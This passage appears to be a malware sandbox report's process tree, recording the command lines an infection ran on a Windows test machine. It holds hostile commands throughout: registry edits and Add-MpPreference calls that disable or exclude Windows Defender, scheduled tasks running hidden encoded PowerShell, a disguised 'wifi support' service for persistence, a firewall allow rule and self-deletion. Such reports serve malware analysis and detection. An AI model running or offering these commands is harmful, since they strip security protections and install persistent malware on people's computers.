REG_SZ /d 6 /reg:64;"2⤵PID:8088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6192
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4676
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:7368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:7360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:7524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:8236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:8392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:11468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:11780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:12144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:7972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:7032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:6808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:11388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:7536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:8384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:8768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:9004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:8212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:9460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:9632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:9928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:10104
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:10360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:323⤵PID:11416
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:324⤵PID:11048
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:643⤵PID:8184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:323⤵PID:8520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:643⤵PID:8508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:323⤵PID:8896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:643⤵PID:11224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:323⤵PID:8252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:643⤵PID:9380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:323⤵PID:11884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:643⤵PID:9520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:323⤵PID:9648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:643⤵PID:9744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:323⤵PID:9916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:643⤵PID:8640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:323⤵PID:10512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:643⤵PID:11028
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFXkgvcmw" /SC once /ST 06:26:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFXkgvcmw"2⤵PID:7964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFXkgvcmw"2⤵PID:8400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 17:41:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\CbvspmS.exe\" lA /site_id 394347 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:6128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YqJChhYnTMHzkMjCc"2⤵PID:7004
-
-
C:\Users\Admin\AppData\Local\Temp\is-9UVVC.tmp\4dDAmyFZRV8vwjUqo5ZUrozw.tmp"C:\Users\Admin\AppData\Local\Temp\is-9UVVC.tmp\4dDAmyFZRV8vwjUqo5ZUrozw.tmp" /SL5="$30464,506127,422400,C:\Users\Admin\Documents\4dDAmyFZRV8vwjUqo5ZUrozw.exe"1⤵PID:7544
-
C:\Users\Admin\AppData\Local\Temp\is-HN2PS.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-HN2PS.tmp\Sharefolder.exe" /S /UID=27092⤵PID:5912
-
C:\Program Files\Windows Media Player\VWXHUDBBNV\foldershare.exe"C:\Program Files\Windows Media Player\VWXHUDBBNV\foldershare.exe" /VERYSILENT3⤵PID:7704
-
-
C:\Users\Admin\AppData\Local\Temp\ba-6500e-340-acdb9-c0ae159595f87\Ryshaejaledae.exe"C:\Users\Admin\AppData\Local\Temp\ba-6500e-340-acdb9-c0ae159595f87\Ryshaejaledae.exe"3⤵PID:5644
-
-
C:\Users\Admin\AppData\Local\Temp\93-c0477-d85-4f983-d2a884a242cd3\Bebaekulusu.exe"C:\Users\Admin\AppData\Local\Temp\93-c0477-d85-4f983-d2a884a242cd3\Bebaekulusu.exe"3⤵PID:5972
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wrwfsqwe.wj4\GcleanerEU.exe /eufive & exit4⤵PID:11032
-
C:\Users\Admin\AppData\Local\Temp\wrwfsqwe.wj4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\wrwfsqwe.wj4\GcleanerEU.exe /eufive5⤵PID:5232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwcoyypd.1uq\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:7344
-
C:\Users\Admin\AppData\Local\Temp\pwcoyypd.1uq\installer.exeC:\Users\Admin\AppData\Local\Temp\pwcoyypd.1uq\installer.exe /qn CAMPAIGN="654"5⤵PID:11356
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pwcoyypd.1uq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pwcoyypd.1uq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862113 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵PID:7960
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaziu3xq.jfq\any.exe & exit4⤵PID:11236
-
C:\Users\Admin\AppData\Local\Temp\jaziu3xq.jfq\any.exeC:\Users\Admin\AppData\Local\Temp\jaziu3xq.jfq\any.exe5⤵PID:11612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdhv1out.iid\gcleaner.exe /mixfive & exit4⤵PID:8364
-
C:\Users\Admin\AppData\Local\Temp\gdhv1out.iid\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\gdhv1out.iid\gcleaner.exe /mixfive5⤵PID:11824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lni2vvwm.s4q\autosubplayer.exe /S & exit4⤵PID:6868
-
C:\Users\Admin\AppData\Local\Temp\lni2vvwm.s4q\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\lni2vvwm.s4q\autosubplayer.exe /S5⤵PID:12248
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqD9DA.tmp\tempfile.ps1"6⤵PID:5168
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqD9DA.tmp\tempfile.ps1"6⤵PID:7908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqD9DA.tmp\tempfile.ps1"6⤵PID:10048
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqD9DA.tmp\tempfile.ps1"6⤵PID:11140
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqD9DA.tmp\tempfile.ps1"6⤵PID:6164
-
-
-
-
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:7924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4024
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4244 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7052
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6444
-
C:\Users\Admin\AppData\Local\Temp\909A.exeC:\Users\Admin\AppData\Local\Temp\909A.exe1⤵PID:8480
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\wglvqeep\2⤵PID:11324
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fzvbmwou.exe" C:\Windows\SysWOW64\wglvqeep\2⤵PID:11428
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create wglvqeep binPath= "C:\Windows\SysWOW64\wglvqeep\fzvbmwou.exe /d\"C:\Users\Admin\AppData\Local\Temp\909A.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:11532
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description wglvqeep "wifi internet conection"2⤵PID:11628
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start wglvqeep2⤵PID:11720
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:11844
-
-
C:\Users\Admin\hfugawhx.exe"C:\Users\Admin\hfugawhx.exe" /d"C:\Users\Admin\AppData\Local\Temp\909A.exe"2⤵PID:11892
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\csnztfjb.exe" C:\Windows\SysWOW64\wglvqeep\3⤵PID:11576
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config wglvqeep binPath= "C:\Windows\SysWOW64\wglvqeep\csnztfjb.exe /d\"C:\Users\Admin\hfugawhx.exe\""3⤵PID:11792
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start wglvqeep3⤵PID:11944
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:11948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7762.bat" "3⤵PID:7088
-
-
-
C:\Users\Admin\AppData\Local\Temp\B21D.exeC:\Users\Admin\AppData\Local\Temp\B21D.exe1⤵PID:11368
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B21D.exe"2⤵PID:10180
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:10588
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:11796
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:12008
-
C:\Users\Admin\AppData\Local\Temp\DBED.exeC:\Users\Admin\AppData\Local\Temp\DBED.exe1⤵PID:6692
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:11868
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9AB165649765949EC07AC0E3A6B653BB C2⤵PID:8608
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32A3B0AD8FCE21FABC1366E1C576483C C2⤵PID:11032
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AD0A80CC84B65EBEEB41BCAEB6F8D9052⤵PID:8752
-
-
C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"2⤵PID:9556
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2A97D9AE0F0DA99F9EA5B73CD1876ADF2⤵PID:7296
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:10640
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11872
-
C:\Users\Admin\AppData\Local\Temp\18C8.exeC:\Users\Admin\AppData\Local\Temp\18C8.exe1⤵PID:8556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵PID:12156
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kdrfglv4\kdrfglv4.cmdline"3⤵PID:9472
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE1CD.tmp" "c:\Users\Admin\AppData\Local\Temp\kdrfglv4\CSCB80DBBE1545547B1833BDCE2C42937.TMP"4⤵PID:5744
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:10132
-
-
-
C:\Users\Admin\AppData\Local\Temp\280C.exeC:\Users\Admin\AppData\Local\Temp\280C.exe1⤵PID:9100
-
C:\Users\Admin\AppData\Local\Temp\e4bd64eb-5a8a-4150-abf3-8e49c7a18bb1\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e4bd64eb-5a8a-4150-abf3-8e49c7a18bb1\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e4bd64eb-5a8a-4150-abf3-8e49c7a18bb1\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:9748
-
C:\Users\Admin\AppData\Local\Temp\e4bd64eb-5a8a-4150-abf3-8e49c7a18bb1\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e4bd64eb-5a8a-4150-abf3-8e49c7a18bb1\AdvancedRun.exe" /SpecialRun 4101d8 97483⤵PID:9944
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\280C.exe" -Force2⤵PID:10444
-
-
C:\Users\Admin\AppData\Local\Temp\280C.exe"C:\Users\Admin\AppData\Local\Temp\280C.exe"2⤵PID:10468
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5412
-
